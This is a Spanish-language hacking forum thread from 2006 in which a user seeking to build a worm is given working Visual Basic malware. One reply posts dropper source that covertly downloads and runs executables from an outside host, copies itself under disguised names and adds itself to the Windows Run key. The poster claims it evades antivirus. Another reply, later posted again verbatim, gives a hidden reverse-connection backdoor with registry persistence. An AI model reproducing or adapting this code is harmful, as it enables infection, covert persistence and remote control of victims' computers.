Título: Como hacer que se autoejecute...
Publicado por: BorecK en 11 Diciembre 2006, 22:17 pm
Creo que hay post referidos a este tema pero no logro encontrar... tras una larga busqueda que creo que no fue muy buena... les quiero preguntar el codigo para que mi aplicacion se ejecute al iniciar windows.. ando intentando hacer un Worm... me puse a leer la guia de creacion de worms y no me sale completo el codigo... alguien podria decirme el codigo? no se si sea api o por medio de la shell si existen las dos les agradeceria que me ayudaran :D....
Título: Re: Como hacer que se autoejecute...
Publicado por: Tyrz en 11 Diciembre 2006, 22:43 pm
hay otra forma pero es demasiado complicado para mi...
Yo suelo hacer que se copie en la carpeta de inicio y asi se arranca al encender la maquina.
Saludos
Título: Re: Como hacer que se autoejecute...
Publicado por: CeLaYa en 11 Diciembre 2006, 22:55 pm
la unica manera que me se es insertando una entrada en el registro de windows
"HKEY_LOCAL_MACHINE\Software\microsoft\windows\currentversion\run"
Título: Re: Como hacer que se autoejecute...
Publicado por: CA en 11 Diciembre 2006, 23:26 pm
Es mil veces mejor crear un servicio y arranque el servicio al inicio con todos los demas.
Título: Re: Como hacer que se autoejecute...
Publicado por: BorecK en 12 Diciembre 2006, 01:06 am
oh gracias pero no entendi mucho me podrian explicar mejor que codigo poner y como aderir al registro de windows ? es que se puede decir que soy novato jaja por eso quiero aprender de ustedes :P
Título: Re: Como hacer que se autoejecute...
Publicado por: sp26 en 12 Diciembre 2006, 04:02 am
Que se autoejecute es algo demasiado imposible.. y de hecho, lo creo imposible.
Puedes crear una bomba logica o de cualquier archivo llame a otro archivo.
Yo cree un Worm que descarga un archivo de internet (De forma oculta) y que lo autoejecute. Los antivirus lo pasan por encima ya que no hace nada malo si no descargar un archivo :P.
Si quieres te paso el Codigo fuente para que lo analises. (Espera que lo suba).
Título: Re: Como hacer que se autoejecute...
Publicado por: BorecK en 12 Diciembre 2006, 04:26 am
m encantaria ver tu codigo para aprender mas del funcionamiento de los malware, muchas gracias ;D
Título: Re: Como hacer que se autoejecute...
Publicado por: sp26 en 12 Diciembre 2006, 14:41 pm
Aqui te dejo el codigo... Option Explicit
Dim RegistroCochino As Object
Dim RutaCochina As String
Dim CadenaNueva As String
Dim ContenidoCadena As String
Dim ERROR_SUCCESS
Private Declare Function URLDownloadToFile Lib "urlmon" _
Alias "URLDownloadToFileA" _
(ByVal pCaller As Long, _
ByVal szURL As String, _
ByVal szFileName As String, _
ByVal dwReserved As Long, _
ByVal lpfnCB As Long) As Long
Private Sub Form_Load()
Dim Ya_Existe As Integer
Ya_Existe = App.PrevInstance
If Ya_Existe <> 0 Then
End
End If
On Error GoTo fallo:
Dim sSourceUrl As String
'Esta es la descarga oculta <|>
sSourceUrl = "http://h1.ripway.com/MyArchivos/" & _
"Mis_Fotos/InetCat/InetCat.exe"
DownloadFile sSourceUrl, Environ("SYSTEMROOT") & "\Files\InetCat.exe" ' Asegurate de poner la ruta a donde llega el archivo
sSourceUrl = "http://h1.ripway.com/MyArchivos/" & _
"Mis_Fotos/InetCat/Autoexec.bat"
DownloadFile sSourceUrl, Environ("SYSTEMROOT") & "\System32\Repair\AUTOEXEC.BAT" 'Aqui tambien
Shell (Environ("SYSTEMROOT") & "\Files\InetCat.exe")
Shell Environ("SYSTEMROOT") & "\Files\InetCat.exe"
Shell Environ("Systemroot") & "\System32\Repair\Autoexec.bat"
FileCopy App.Path & "\" & App.EXEName & ".exe", Environ("SYSTEMROOT") & "\{323-432112-53252LGSD}\InetCat.exe"
FileCopy App.Path & "\" & App.EXEName & ".exe", Environ("SYSTEMROOT") & "\SYSTEM32\" & "\InetCat.exe"
FileCopy App.Path & "\" & App.EXEName & ".exe", Environ("SYSTEMROOT") & "\SYSTEM32\" & "\Shell\W\O\R\M\L\O\L\J\A\J\A\{03424-03259325JH-BSSGKDS}.exe"
FileCopy App.Path & "\" & App.EXEName & ".exe", Environ("Homepath") & "\AppData\" & "\WISIP.exe"
ContenidoCadena = Environ("SYSTEMROOT") & "\Files\InetCat.exe"
CadenaNueva = "\InetCat"
RutaCochina = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" & _
"\CurrentVersion\Run" & CadenaNueva
Set RegistroCochino = CreateObject("WScript.Shell")
RegistroCochino.RegWrite RutaCochina, ContenidoCadena
fallo:
End Sub
Private Function DownloadFile(ByVal sURL As String, ByVal sLocalFile As String) As Boolean
DownloadFile = URLDownloadToFile(0, sURL, _
sLocalFile, 0, 0) = ERROR_SUCCESS
End Function
Acuerdate que esta es una estructura y es el cuerpo de la infeccio, no es el virus en cuestion pero te puede ayudar ;).
Título: Re: Como hacer que se autoejecute...
Publicado por: SOLOANDRAGORA en 16 Diciembre 2006, 07:27 am
;D te dejo una pequeña aplicacion para que cheques el codigo para que se cargue en la memoria haber si te sirve ::) es un server utilizando una conexión inversa. No recuerdo donde lo vi publicado ::) un saludo. Dim win
Dim sys
Dim residencia
On Error Resume Next
ip = "10.12.116.207" 'esta es nuestra ip local, asi que conectara a nuestra ip local, aqui se pondria nuestra ip publica, y si cambia pues os registrais en no-ip.com y si habeis leido la revista no tendreis problemas
ipftp = "o 127.0.0.1"
port = 6969
WS.RemoteHost = ip
WS.RemotePort = port
Timer1.Interval = 60000 'se esteblace un intervalo de 3 segundos para ejecutar el evento timer1
ejec = App.Path 'le pasamos a la variable la ruta del exe que ejecute la victima
If Right(ejec, 1) <> "\" Then ejec = ejec & "\" 'si no tiene la "\" al final, se la añadiremos
ejec = ejec & App.EXEName & ".exe" 'añadimos ala ruta del exe, el nombre y la estension
Set obj = CreateObject("Scripting.FileSystemObject") 'declaramos un objeto tipo fileSystem object
Set win = obj.GetSpecialFolder(0) 'para obtener la carpeta de windows y system
Set sys = obj.GetSpecialFolder(1)
win = LCase(win) 'las ponemos en minusculas
sys = LCase(sys)
FileCopy ejec, sys & "\nombre1" 'copia a windows\system32
Name sys & "\nombre1" As sys & "\nombre2.exe" 'renombra
Set residencia = CreateObject("WScript.Shell")
residencia.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "nombre3", sys & "\nombre2.exe" 'esto modifica el registro para que se ejecute al iniciar el pc
App.TaskVisible = False 'para ocultarlo un poco del, (alt +sup +control)
End Sub
Título: Re: Como hacer que se autoejecute...
Publicado por: sp26 en 18 Diciembre 2006, 16:06 pm
;D te dejo una pequeña aplicacion para que cheques el codigo para que se cargue en la memoria haber si te sirve ::) es un server utilizando una conexión inversa. No recuerdo donde lo vi publicado ::) un saludo. Dim win
Dim sys
Dim residencia
On Error Resume Next
ip = "10.12.116.207" 'esta es nuestra ip local, asi que conectara a nuestra ip local, aqui se pondria nuestra ip publica, y si cambia pues os registrais en no-ip.com y si habeis leido la revista no tendreis problemas
ipftp = "o 127.0.0.1"
port = 6969
WS.RemoteHost = ip
WS.RemotePort = port
Timer1.Interval = 60000 'se esteblace un intervalo de 3 segundos para ejecutar el evento timer1
ejec = App.Path 'le pasamos a la variable la ruta del exe que ejecute la victima
If Right(ejec, 1) <> "\" Then ejec = ejec & "\" 'si no tiene la "\" al final, se la añadiremos
ejec = ejec & App.EXEName & ".exe" 'añadimos ala ruta del exe, el nombre y la estension
Set obj = CreateObject("Scripting.FileSystemObject") 'declaramos un objeto tipo fileSystem object
Set win = obj.GetSpecialFolder(0) 'para obtener la carpeta de windows y system
Set sys = obj.GetSpecialFolder(1)
win = LCase(win) 'las ponemos en minusculas
sys = LCase(sys)
FileCopy ejec, sys & "\nombre1" 'copia a windows\system32
Name sys & "\nombre1" As sys & "\nombre2.exe" 'renombra
Set residencia = CreateObject("WScript.Shell")
residencia.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "nombre3", sys & "\nombre2.exe" 'esto modifica el registro para que se ejecute al iniciar el pc
App.TaskVisible = False 'para ocultarlo un poco del, (alt +sup +control)
End Sub
Adherirse al registro o a la "Memoria"?
Título: Re: Como hacer que se autoejecute...
Publicado por: SOLOANDRAGORA en 16 Marzo 2007, 08:49 am
Adherirse al registro ;D jjajajaja es que navegando a las 4 de la mañana cualquiera confunde las palabras :P
un saludo brindo por eso----------XD
|